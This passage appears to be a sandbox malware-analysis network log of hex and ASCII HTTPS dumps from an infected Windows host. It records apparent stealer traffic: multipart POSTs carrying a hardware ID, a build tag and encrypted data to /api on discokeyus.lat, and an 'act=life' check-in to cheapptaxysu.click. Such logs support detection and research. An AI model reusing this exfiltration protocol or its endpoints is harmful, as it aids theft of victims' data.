2024-12-22 01:18:50 UTC	1369	IN	Data Raw: 59 63 51 33 77 7a 77 42 4d 69 34 2b 43 57 38 36 65 79 50 4c 42 6a 2f 6a 39 54 61 43 6d 51 6c 36 70 74 4f 5a 57 34 57 48 36 6e 63 75 77 48 6e 33 63 6b 59 36 65 48 30 46 55 6a 70 76 4e 2f 49 75 42 61 4c 62 45 71 4b 6b 54 58 43 42 68 70 55 76 6a 64 65 6a 52 57 4f 45 65 59 5a 38 41 47 4a 67 64 51 73 6e 50 58 42 35 72 57 68 47 74 4b 5a 69 7a 38 35 64 51 38 69 4b 6c 77 33 4b 6e 2b 41 41 4c 70 70 35 6b 48 78 42 49 53 6f 33 51 32 51 76 59 6e 37 4c 42 6a 50 68 39 44 43 4f 6a 68 68 54 75 4b 33 43 47 49 54 4a 74 56 68 2f 79 48 65 49 4d 30 5a 36 41 57 55 4e 4a 77 59 76 65 65 31 34 54 4b 2f 47 4d 70 61 51 43 45 71 58 33 76 41 56 6a 63 61 6b 58 6e 6d 48 65 59 5a 38 41 47 4a 67 64 77 73 6e 50 58 42 35 72 57 68 47 74 4b 5a 69 7a 38 35 64 51 38 69 4b 6c 77 33 4b 6e 2b 41 Data Ascii: YcQ3wzwBMi4+CW86eyPLBj/j9TaCmQl6ptOZW4WH6ncuwHn3ckY6eH0FUjpvN/IuBaLbEqKkTXCBhpUvjdejRWOEeYZ8AGJgdQsnPXB5rWhGtKZiz85dQ8iKlw3Kn+AALpp5kHxBISo3Q2QvYn7LBjPh9DCOjhhTuK3CGITJtVh/yHeIM0Z6AWUNJwYvee14TK/GMpaQCEqX3vAVjcakXnmHeYZ8AGJgdwsnPXB5rWhGtKZiz85dQ8iKlw3Kn+A
2024-12-22 01:18:50 UTC	1369	IN	Data Raw: 6f 6f 63 41 54 51 37 5a 51 73 6e 4e 53 46 68 74 54 6b 65 2f 2f 34 2b 6e 39 49 49 52 6f 48 54 6d 56 75 45 68 2b 6f 4f 62 34 49 70 78 54 4d 42 62 6a 34 72 53 79 63 6d 4c 79 43 31 4c 6c 53 33 6f 48 2f 59 6a 45 38 45 78 74 54 55 43 5a 6a 42 73 56 68 74 7a 77 66 32 45 52 51 6c 4b 43 59 48 56 6a 52 6c 4c 2b 41 37 42 4f 6a 4e 44 37 57 4d 43 45 79 46 30 65 59 4e 69 63 65 38 53 53 37 47 65 64 42 38 58 6d 49 56 4e 30 4a 33 4f 69 46 33 74 54 52 55 74 37 4d 38 69 70 6b 66 58 38 71 55 7a 52 7a 4b 32 50 78 58 4c 70 35 35 6b 47 39 49 59 69 70 6c 48 53 64 2b 62 7a 54 30 4f 78 72 73 34 53 4f 65 6e 52 6c 66 77 61 33 70 4e 70 6a 41 6f 6b 30 73 75 54 54 4d 4b 68 4d 68 4b 43 4a 37 57 52 52 7a 50 75 55 37 56 73 50 30 50 4a 53 67 4d 57 75 58 6c 4d 64 5a 72 4d 53 6b 54 53 37 47 Data Ascii: oocATQ7ZQsnNSFhtTke//4+n9IIRoHTmVuEh+oOb4IpxTMBbj4rSycmLyC1LlS3oH/YjE8ExtTUCZjBsVhtzwf2ERQlKCYHVjRlL+A7BOjND7WMCEyF0eYNice8SS7GedB8XmIVN0J3OiF3tTRUt7M8ipkfX8qUzRzK2PxXLp55kG9IYiplHSd+bzT0Oxrs4SOenRlfwa3pNpjAok0suTTMKhMhKCJ7WRRzPuU7VsP0PJSgMWuXlMdZrMSkTS7G

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.4	50222	104.21.21.99	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:51 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=GFBG3WQUQUS3HI9FONC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18169 Host: discokeyus.lat
2024-12-22 01:18:51 UTC	15331	OUT	Data Raw: 2d 2d 47 46 42 47 33 57 51 55 51 55 53 33 48 49 39 46 4f 4e 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 47 46 42 47 33 57 51 55 51 55 53 33 48 49 39 46 4f 4e 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 46 42 47 33 57 51 55 51 55 53 33 48 49 39 46 4f 4e 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 Data Ascii: --GFBG3WQUQUS3HI9FONCContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--GFBG3WQUQUS3HI9FONCContent-Disposition: form-data; name="pid"2--GFBG3WQUQUS3HI9FONCContent-Disposition: form-data; name="lid"PsFKDg--pa
2024-12-22 01:18:51 UTC	2838	OUT	Data Raw: 2c 95 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 Data Ascii: ,@xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pyb
2024-12-22 01:18:52 UTC	1131	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lbsdp3q6p642i5na1436k675vj; expires=Wed, 16 Apr 2025 19:05:31 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=spny2av9IMUxLGRJUSO93%2BA%2F2LZw1I7xDiqCQ4rBka4R3HwdVUx6umM%2BomDQAKwjfxR3NmJWeWo7HdHWjnQdN9G3Hk215lPHptIRw1fMNHiIwOWIMenui2WhAFjMOeCN%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c47c5bd5a78d6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1932&rtt_var=760&sent=16&recv=21&lost=0&retrans=0&sent_bytes=2832&recv_bytes=19130&delivery_rate=1511387&cwnd=147&unsent_bytes=0&cid=380aeafe8aed2fd0&ts=988&x=0"
2024-12-22 01:18:52 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:18:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.4	50238	104.21.21.99	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:54 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=CTKA333H User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8724 Host: discokeyus.lat
2024-12-22 01:18:54 UTC	8724	OUT	Data Raw: 2d 2d 43 54 4b 41 33 33 33 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 43 54 4b 41 33 33 33 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 54 4b 41 33 33 33 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 43 54 4b 41 33 33 33 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 Data Ascii: --CTKA333HContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--CTKA333HContent-Disposition: form-data; name="pid"2--CTKA333HContent-Disposition: form-data; name="lid"PsFKDg--pablo--CTKA333HContent-Disposit
2024-12-22 01:18:55 UTC	1137	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ru5e1bqqmg812k661rn0b31djn; expires=Wed, 16 Apr 2025 19:05:33 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WgNLnpdY%2Bl%2F%2F%2FrfI1UZa5hjU54zMXsA1we75%2FzcovDF9kWR9raYenkxZhAc36%2Fpn2CF8CBDroX9aCitZgJX7cSiIEq%2BOH%2Blb2uHUpQF6qULkkVSyqlB0xdWSeCXazBMBg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c47d5cde341ff-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1581&rtt_var=602&sent=7&recv=16&lost=0&retrans=0&sent_bytes=2832&recv_bytes=9651&delivery_rate=1803582&cwnd=240&unsent_bytes=0&cid=95f8bbe2f3780bcb&ts=822&x=0"
2024-12-22 01:18:55 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:18:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.4	50240	104.21.67.146	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:54 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: cheapptaxysu.click
2024-12-22 01:18:54 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-22 01:18:54 UTC	564	IN	HTTP/1.1 403 Forbidden Date: Sun, 22 Dec 2024 01:18:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6SSQSxv7PYjbu6zdvJ61%2FOvdzgJVvlHWxFLuiiY6PRfx2TI4q0Ktga0pdm1WdZgB%2BdVlBJbih4%2BYSeVsQ8B9h8KuG4vRFJqXTkwx4BtA3uPP%2FemmxuUhyVnLCO%2B8avts6eD46%2Bc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c47d80cdb4385-EWR
2024-12-22 01:18:54 UTC	805	IN	Data Raw: 31 31 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-12-22 01:18:54 UTC	1369	IN	Data Raw: 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d Data Ascii: n-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElem
2024-12-22 01:18:54 UTC	1369	IN	Data Raw: 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <for
2024-12-22 01:18:54 UTC	1013	IN	Data Raw: 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e Data Ascii: " class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span
2024-12-22 01:18:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.4	50234	172.217.19.228	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:54 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-22 01:18:55 UTC	1266	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:55 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-0g1bVPkOXDBL-RG6dk3ZNQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-22 01:18:55 UTC	124	IN	Data Raw: 36 64 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 73 74 72 65 61 6d 69 6e 67 20 6d 6f 76 69 65 73 22 2c 22 64 72 6f 6e 65 73 22 2c 22 63 6f 6c 6c 65 67 65 20 66 6f 6f 74 62 61 6c 6c 20 70 6c 61 79 6f 66 66 20 62 72 61 63 6b 65 74 22 2c 22 6d 61 72 76 65 6c 20 72 69 76 61 6c 73 20 77 69 6e 20 72 61 74 65 73 22 2c 22 6a 61 6d 65 73 20 67 75 6e 6e 20 73 75 70 65 72 6d 61 6e Data Ascii: 6d5)]}'["",["streaming movies","drones","college football playoff bracket","marvel rivals win rates","james gunn superman
2024-12-22 01:18:55 UTC	1390	IN	Data Raw: 20 6d 6f 76 69 65 20 74 72 61 69 6c 65 72 22 2c 22 6e 65 77 20 73 70 65 63 69 65 73 20 64 69 73 63 6f 76 65 72 65 64 20 70 65 72 75 22 2c 22 63 6f 73 74 63 6f 20 66 6f 6f 64 20 63 6f 75 72 74 20 63 6f 6b 65 20 70 72 6f 64 75 63 74 73 22 2c 22 6c 61 73 20 76 65 67 61 73 20 72 61 69 64 65 72 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 Data Ascii: movie trailer","new species discovered peru","costco food court coke products","las vegas raiders"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:sugges
2024-12-22 01:18:55 UTC	242	IN	Data Raw: 56 48 46 61 56 56 6c 4c 65 54 59 79 4e 58 56 4a 4e 6b 74 43 56 44 68 32 53 56 41 34 4f 54 63 35 52 6c 5a 32 53 30 52 5a 52 46 59 79 55 32 45 76 51 6d 35 4f 63 57 46 54 63 31 4a 77 64 46 42 53 62 6b 4a 59 63 33 64 49 51 6d 70 6a 63 6e 5a 6e 4e 6b 45 31 4e 6d 31 6e 5a 6d 56 73 4e 44 4e 4f 59 54 6c 4d 63 45 31 7a 4c 30 46 61 5a 32 35 76 53 32 6c 30 61 57 35 78 4f 57 30 79 55 55 56 75 51 56 68 32 53 56 59 78 55 46 6c 6b 52 48 68 76 61 32 56 49 4d 44 6c 35 63 54 49 76 51 33 46 4e 61 45 52 54 57 44 56 56 54 6e 52 34 4d 7a 4a 54 51 57 78 4b 56 6e 56 59 4d 6b 67 77 4d 45 68 45 65 46 4e 68 54 48 52 75 56 6d 68 4a 53 46 4e 75 55 48 45 72 65 46 46 6d 4f 45 46 48 62 44 45 34 55 44 55 78 5a 46 4a 57 4d 46 55 79 61 56 5a 57 0d 0a Data Ascii: VHFaVVlLeTYyNXVJNktCVDh2SVA4OTc5RlZ2S0RZRFYyU2EvQm5OcWFTc1JwdFBSbkJYc3dIQmpjcnZnNkE1Nm1nZmVsNDNOYTlMcE1zL0FaZ25vS2l0aW5xOW0yUUVuQVh2SVYxUFlkRHhva2VIMDl5cTIvQ3FNaERTWDVVTnR4MzJTQWxKVnVYMkgwMEhEeFNhTHRuVmhJSFNuUHEreFFmOEFHbDE4UDUxZFJWMFUyaVZW
2024-12-22 01:18:55 UTC	93	IN	Data Raw: 35 37 0d 0a 65 57 31 76 62 45 78 44 4d 7a 4e 72 63 45 4a 54 4d 6d 78 42 53 6a 4e 78 65 6a 4a 42 53 6a 64 6e 59 7a 5a 68 53 7a 5a 4a 55 48 68 48 61 31 4e 4a 56 31 41 34 51 57 52 4e 54 33 68 35 5a 6c 4a 69 59 57 67 76 5a 54 4e 54 62 6c 64 77 56 6a 52 30 53 57 35 54 55 6c 56 0d 0a Data Ascii: 57eW1vbExDMzNrcEJTMmxBSjNxejJBSjdnYzZhSzZJUHhHa1NJV1A4QWRNT3h5ZlJiYWgvZTNTbldwVjR0SW5TUlV
2024-12-22 01:18:55 UTC	1390	IN	Data Raw: 38 62 39 0d 0a 76 63 54 56 46 52 32 4a 48 57 45 56 72 62 32 46 56 52 58 56 4b 55 57 39 6e 4e 32 74 46 4f 47 4a 6e 56 57 63 34 4f 45 68 48 54 6b 4a 69 4d 57 31 78 57 47 35 61 62 46 46 6a 62 31 56 70 62 33 6c 4a 5a 32 70 73 64 33 42 68 59 58 64 48 62 6b 56 31 52 57 74 78 51 58 68 6f 55 56 42 50 54 57 70 71 61 32 4e 6a 61 6c 5a 31 4d 55 56 32 52 32 74 56 55 6d 31 31 64 56 5a 79 4d 31 4a 6b 55 47 67 72 65 57 70 4f 51 6b 6c 56 64 45 52 53 53 53 39 45 4d 48 64 50 4d 32 31 6b 56 7a 46 4c 63 6b 35 47 64 57 6c 74 64 44 49 33 52 6d 4e 75 62 44 5a 45 53 46 4d 7a 52 6d 78 35 62 7a 64 6d 64 46 68 4a 4e 56 64 51 59 55 31 78 4d 6d 74 6f 53 31 46 72 51 55 46 6e 4e 55 39 6a 5a 45 31 77 56 6d 49 7a 4d 46 52 4d 64 47 56 76 55 6c 6c 68 61 30 39 54 56 6d 68 44 55 54 4a 73 57 Data Ascii: 8b9vcTVFR2JHWEVrb2FVRXVKUW9nN2tFOGJnVWc4OEhHTkJiMW1xWG5abFFjb1Vpb3lJZ2psd3BhYXdHbkV1RWtxQXhoUVBPTWpqa2NjalZ1MUV2R2tVUm11dVZyM1JkUGgreWpOQklVdERSSS9EMHdPM21kVzFLck5GdWltdDI3RmNubDZESFMzRmx5bzdmdFhJNVdQYU1xMmtoS1FrQUFnNU9jZE1wVmIzMFRMdGVvUllha09TVmhDUTJsW
2024-12-22 01:18:55 UTC	850	IN	Data Raw: 51 32 67 35 65 57 78 6e 4e 7a 4d 30 51 30 5a 47 55 6d 6c 6c 63 56 49 72 63 48 5a 35 53 55 68 49 55 54 52 33 5a 45 52 74 52 6c 5a 54 65 58 6c 36 52 6d 31 53 4d 6a 56 56 55 6e 41 30 54 32 68 30 57 55 46 56 55 45 35 4a 57 47 70 4a 55 32 56 4e 61 69 74 30 54 32 45 34 64 32 67 33 51 6c 5a 72 53 31 51 34 63 54 42 75 51 6c 51 35 52 48 4a 43 4d 31 41 30 56 6c 63 76 57 46 68 47 64 6e 56 52 64 33 68 4a 56 57 4e 78 61 31 46 73 51 6d 78 68 61 6a 5a 76 64 31 56 4c 53 6a 64 75 51 55 6f 77 51 79 38 78 63 54 64 77 56 6c 4a 70 5a 54 56 53 62 7a 64 4e 52 30 68 71 51 6d 46 5a 4e 48 6c 4e 4e 58 67 31 51 57 52 50 51 55 4a 75 53 45 39 6b 59 6d 4a 33 64 6a 68 4e 63 46 5a 52 5a 47 6f 78 55 7a 56 4a 4e 32 6c 5a 55 55 38 72 54 46 51 7a 59 33 42 57 53 55 6b 76 56 57 39 49 4e 56 63 Data Ascii: 